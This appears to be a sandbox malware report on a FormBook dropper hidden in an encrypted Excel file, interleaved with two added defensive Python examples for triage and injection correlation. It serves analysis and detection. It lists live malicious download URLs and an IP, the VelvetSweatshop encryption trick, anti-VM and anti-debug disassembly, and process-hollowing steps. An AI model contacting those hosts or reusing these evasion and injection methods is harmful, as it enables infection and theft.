Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Unique food order.xlsx Stream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)
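The two static indicators the report derives from the container (OLE indicators encrypted = True, vbamacros = False, and the near-maximal 7.9999 entropy of the EncryptedPackage stream) describe the same thing: the .xlsx is an OLE/CFB wrapper around an encrypted OOXML package, so the real workbook is opaque to static checks until it is decrypted. The VelvetSweatshopxlsx tag points at the usual trick: Excel opens a workbook encrypted with the legacy default password VelvetSweatshop without prompting, so the victim sees nothing while scanners see only ciphertext. The following is an added example, not code from the report, that reproduces those indicators over the stream names and contents an OLE parser would return; the two streams are constructed stand-ins (synthetic bytes), and the 7.9 entropy threshold is an assumption chosen to approximate the reported value.

```python
"""Triage of an encrypted OOXML container by OLE stream names and entropy.

Added example, not part of the Joe Sandbox report. An encrypted .xlsx is a
CFB/OLE container holding an 'EncryptionInfo' stream and an 'EncryptedPackage'
stream whose first 8 bytes are the little-endian size of the plaintext ZIP.
The stream contents below are synthetic; the threshold is an assumption.
"""
import math
from collections import Counter

ENTROPY_THRESHOLD = 7.9   # bits per byte; assumption, approximates the report's 7.9999


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Constructed streams standing in for what an OLE parser (e.g. olefile) returns.
SAMPLE_STREAMS = {
    # version 4.4 header followed by an agile-encryption XML descriptor (synthetic text)
    "EncryptionInfo": b"\x04\x00\x04\x00\x40\x00\x00\x00"
                      + b'<encryption xmlns="http://schemas.microsoft.com/office/2006/encryption">' * 8,
    # 8-byte plaintext size, then bytes that are uniformly distributed like ciphertext
    "EncryptedPackage": (4096).to_bytes(8, "little") + bytes(range(256)) * 16,
}


def triage_ole_streams(streams, threshold=ENTROPY_THRESHOLD):
    """Reproduce the report's OLE indicators (encrypted, vbamacros) plus per-stream entropy."""
    names = {n.lower() for n in streams}
    encrypted = {"encryptioninfo", "encryptedpackage"} <= names
    # VBA project streams sit under Macros/ or _VBA_PROJECT_CUR/ in an OLE container.
    # Caveat: on an encrypted container this only inspects the wrapper; a vbaProject.bin
    # inside the encrypted ZIP is invisible here, so vbamacros=False is not a clean bill.
    vbamacros = any(n.startswith(("macros/", "_vba_project_cur/")) or "/vba/" in n for n in names)
    entropy = {n: round(shannon_entropy(b), 4) for n, b in streams.items()}

    declared_size = None
    if encrypted:
        pkg_name = next(n for n in streams if n.lower() == "encryptedpackage")
        declared_size = int.from_bytes(streams[pkg_name][:8], "little")
        if entropy[pkg_name] >= threshold:
            verdict = "encrypted-opaque"
            next_step = ("decrypt before static analysis; try the Excel default password "
                         "'VelvetSweatshop' first, then re-run VBA/OLE object checks on the plaintext")
        else:
            verdict = "encrypted-low-entropy"
            next_step = "EncryptedPackage does not look like ciphertext; inspect the container by hand"
    else:
        verdict = "plain"
        next_step = "run VBA/OLE object analysis directly"

    return {
        "encrypted": encrypted,
        "vbamacros": vbamacros,
        "entropy": entropy,
        "declared_package_size": declared_size,
        "verdict": verdict,
        "next_step": next_step,
    }


if __name__ == "__main__":
    for key, value in triage_ole_streams(SAMPLE_STREAMS).items():
        print(f"{key:>22}: {value}")
```

With a real file, `olefile.OleFileIO(path)` gives the stream paths (join each `listdir()` entry with '/') and `openstream()` their bytes; `msoffcrypto-tool encrypted.xlsx decrypted.xlsx -p VelvetSweatshop` produces the plaintext package to feed back into the same triage. The declared size is worth recording: a declared plaintext size wildly out of line with the stream length is a sign the container was tampered with rather than produced by Office.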

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
Tries to detect Any.run
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F13 second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000314FA0 second address: 0000000000314FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000001B4FA0 second address: 00000000001B4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E46CBC9Dh 0x0000001f popad 0x00000020 call 00007FA1E46CB971h 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3008 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000 4_2_0031044B
Hides threads from debuggers
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312F56 LdrInitializeThunk, 4_2_00312F56
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h] 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h] 4_2_00311C16
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314802 mov eax, dword ptr fs:[00000030h] 4_2_00314802
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h] 4_2_00314CBB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315531 mov eax, dword ptr fs:[00000030h] 4_2_00315531
Source: C:\Users\Public\vbc.exe Code function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h] 4_2_003129C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h] 4_2_00311E09
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311721 mov eax, dword ptr fs:[00000030h] 4_2_00311721
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h] 5_2_1E9A26F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h] 5_2_001B4802
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h] 5_2_001B29C2
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h] 5_2_001B5435
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h] 5_2_001B5449
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h] 5_2_001B5472
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B548D mov eax, dword ptr fs:[00000030h] 5_2_001B548D
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h] 5_2_001B4CBB
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h] 5_2_001B54B9
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h] 5_2_001B5531
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h] 9_2_020C26F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
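The signatures in this section are individual API-level observations (an RWX section mapped into explorer.exe and NAPSTAT.EXE, a thread context rewritten in PID 1388, an APC queued into explorer.exe, a section unmapped in NAPSTAT.EXE at base 0x960000, processes created suspended); the analyst's job is to correlate them per target process into a named technique, and to avoid calling every suspended start "hollowing". The following is an added example, not code from the report or from Joe Sandbox, that does that correlation over a constructed NT API-call trace. The API names are real NT system calls; the order of calls, the PIDs other than 2868 (vbc.exe) and 1388 (explorer.exe), and the detail strings are assumptions modelled loosely on the behaviour listed above.

```python
"""Correlating cross-process API calls into injection techniques.

Added example, not part of the Joe Sandbox report. The trace is constructed:
API names are real NT system calls, but call order, the detail strings and
the PIDs other than 2868 and 1388 are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    caller: int        # PID issuing the call
    api: str           # NT API name as a sandbox hook would log it
    target: int        # PID of the process the call acts on
    detail: str = ""   # flags / page protection / base address


TRACE = [
    # vbc.exe (2868) into the already running explorer.exe (1388): RWX section, thread context, APC
    ApiCall(2868, "NtMapViewOfSection", 1388, "PAGE_EXECUTE_READWRITE"),
    ApiCall(2868, "NtSetContextThread", 1388),
    ApiCall(2868, "NtQueueApcThread", 1388),
    # injected explorer.exe starts NAPSTAT.EXE suspended; vbc.exe then hollows it
    ApiCall(1388, "NtCreateUserProcess", 3100, r"CREATE_SUSPENDED C:\Windows\SysWOW64\NAPSTAT.EXE"),
    ApiCall(2868, "NtUnmapViewOfSection", 3100, "base=0x960000"),
    ApiCall(2868, "NtMapViewOfSection", 3100, "PAGE_EXECUTE_READWRITE"),
    ApiCall(2868, "NtSetContextThread", 3100),
    ApiCall(2868, "NtResumeThread", 3100),
    # EQNEDT32.EXE (2100) starts vbc.exe (2692) suspended and simply resumes it: no hollowing by itself
    ApiCall(2100, "NtCreateUserProcess", 2692, r"CREATE_SUSPENDED C:\Users\Public\vbc.exe"),
    ApiCall(2100, "NtResumeThread", 2692),
]


def step_of(call: ApiCall):
    """Map one API call to the injection primitive it represents (None if not one)."""
    if call.api == "NtCreateUserProcess" and "CREATE_SUSPENDED" in call.detail:
        return "create_suspended"
    if call.api == "NtUnmapViewOfSection":
        return "unmap"
    if call.api == "NtWriteVirtualMemory":
        return "write"
    if call.api == "NtMapViewOfSection" and "EXECUTE" in call.detail and "WRITE" in call.detail:
        return "map_rwx"
    if call.api == "NtSetContextThread":
        return "set_context"
    if call.api == "NtResumeThread":
        return "resume"
    if call.api == "NtQueueApcThread":
        return "apc"
    return None


HOLLOW_ORDER = ("create_suspended", "unmap", "set_context", "resume")


def correlate(trace):
    """Return {target_pid: [technique, ...]} for every target that shows an injection pattern."""
    steps = defaultdict(list)   # target -> [(step, caller)] in trace order
    for call in trace:
        step = step_of(call)
        if step:
            steps[call.target].append((step, call.caller))

    verdicts = {}
    for target, seq in steps.items():
        names = [s for s, _ in seq]
        first = {s: names.index(s) for s in set(names)}          # first position of each step
        remote = {s for s, caller in seq if caller != target}    # steps done by another process
        found = []
        # Hollowing: suspended start, original image unmapped, new code placed, entry point
        # redirected, thread resumed, and in that order.
        if (all(s in first for s in HOLLOW_ORDER)
                and ("write" in first or "map_rwx" in first)
                and first["create_suspended"] < first["unmap"] < first["set_context"] < first["resume"]):
            found.append("process_hollowing")
        # APC injection: code placed in a process nobody created for the purpose, then an APC queued.
        if "apc" in remote and ({"write", "map_rwx"} & remote) and "create_suspended" not in names:
            found.append("apc_injection")
        # Thread hijack: a foreign process rewrites a thread context without a suspended create.
        if "set_context" in remote and "create_suspended" not in names:
            found.append("remote_thread_context_modification")
        if found:
            verdicts[target] = found
    return verdicts


if __name__ == "__main__":
    for target, techniques in correlate(TRACE).items():
        print(f"PID {target}: {', '.join(techniques)}")
```

The third group in the trace is the edge case worth keeping: a suspended create followed by a plain resume is what many installers and debuggers do, so it must not score as hollowing on its own; only the unmap plus write/map plus context change in between turns it into one. The rule ordering also explains why the report lists "Creates a process in suspended mode (likely to inject code)" as a weaker, separate signature from "Sample uses process hollowing technique".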

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Behavior Graph

Behavior Graph ID: 320235
Sample: Unique food order.xlsx
Startdate: 19/11/2020
Architecture: WINDOWS
Score: 100

Signatures on the sample node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures.

Process tree (rendered graph, flattened):

  Unique food order.xlsx
    EXCEL.EXE (started)
      dropped: C:\Users\user\...\~$Unique food order.xlsx, data
    EQNEDT32.EXE (started)
      signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      DNS/IP: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu, 103.125.191.5, ports 49165, 49166, 80, VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam
      dropped: C:\Users\user\AppData\...\svchost[1].exe, PE32
      dropped: C:\Users\Public\vbc.exe, PE32
      vbc.exe (started)
        signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
        vbc.exe (started)
          signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
          explorer.exe (injected)
            NAPSTAT.EXE (started)
              signature: Tries to detect virtualization through RDTSC time measurements
              cmd.exe (started)
            autoconv.exe (started)

Contacted Public IPs

IP             Domain   Country   ASN     ASN Name                                            Malicious
103.125.191.5  unknown  Viet Nam  135905  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN  true

Contacted Domains

Name                                              IP             Active
wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu  103.125.191.5  true

Contacted URLs

http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe
  Malicious: true
  Antivirus Detection: 1% (Virustotal); Avira URL Cloud: malware
  Reputation: unknown

http://103.125.191.5/bin_xMjelaYnr43.bin
  Malicious: true
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown